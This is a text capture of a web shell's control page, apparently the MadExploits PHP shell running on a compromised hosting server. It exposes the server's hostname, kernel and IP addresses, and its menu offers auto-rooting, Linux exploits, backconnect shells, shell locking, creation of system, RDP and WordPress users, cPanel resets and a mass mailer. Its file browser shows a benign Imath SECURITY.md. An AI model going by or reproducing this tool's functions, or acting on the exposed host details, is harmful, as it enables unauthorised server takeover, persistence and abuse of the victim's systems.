Linux clientvps21.redlake.in 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
LiteSpeed
: 95.216.48.241 | : 216.73.216.125
14 Domain
8.1.34
mydemowebs
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
imath /
[ HOME SHELL ]
Name
Size
Permission
Action
CHANGES.md
17.64
KB
-rw-r--r--
CODE_OF_CONDUCT.md
2.06
KB
-rw-r--r--
CONTRIBUTING.md
15.33
KB
-rw-r--r--
CONTRIBUTORS.md
661
B
-rw-r--r--
README.md
5.64
KB
-rw-r--r--
SECURITY.md
576
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : SECURITY.md
# Security Policy ## Reporting a Vulnerability If you think you've found a potential vulnerability in Imath, please report it by emailing security@openexr.org. Only OpenEXR Technical Steering Committee members and Academy Software Foundation project management have access to these messages. Include detailed steps to reproduce the issue, and any other information that could aid an investigation. Our policy is to respond to vulernability reports within 14 days. Our policy is to address critical security vulnerabilities rapidly and post patches as quickly as possible.
Close